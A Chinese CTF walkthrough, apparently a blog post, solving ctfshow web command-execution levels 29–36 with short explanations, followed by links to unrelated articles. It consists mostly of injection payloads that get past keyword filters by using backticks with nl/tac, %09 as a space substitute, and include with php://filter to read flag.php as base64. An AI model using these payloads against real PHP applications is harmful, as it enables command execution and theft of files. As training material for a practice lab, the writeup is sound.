ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
kyle~1 分钟前
Linux时间系统1 --- 正确使用时间
java·linux·服务器
星纬智联技术2 分钟前
给 Amp 配置自定义 API:CLIProxyAPI 接入教程
运维·服务器·数据库
KK溜了溜了7 分钟前
Prometheus配置监控项和告警规则
linux·grafana·prometheus
SoveTingღ11 分钟前
【问题解析】Socket已经关闭了,但是端口还处于listening状态?
linux·服务器·c++·qt·socket
无限进步_12 分钟前
【Linux】进程基础:task_struct、fork 与查看进程
linux·运维·服务器
小夏子_riotous19 分钟前
Kubernetes学习路径——3. Kubernetes 1.25 高可用集群部署实战:从 Docker 到 Calico 全链路详解
linux·运维·学习·docker·容器·kubernetes·centos
bukeyiwanshui20 分钟前
20260512 docker笔记
linux·运维·笔记·docker·容器
dhashdoia21 分钟前
Claude Code /goal功能深度解析:从自动化编程到目标驱动开发
运维·人工智能·自动化·claude
黑贝是条狗34 分钟前
Excel批量处理工具
linux·运维·excel
实心儿儿39 分钟前
Linux —— 进程间通信 - 匿名管道
linux·运维·服务器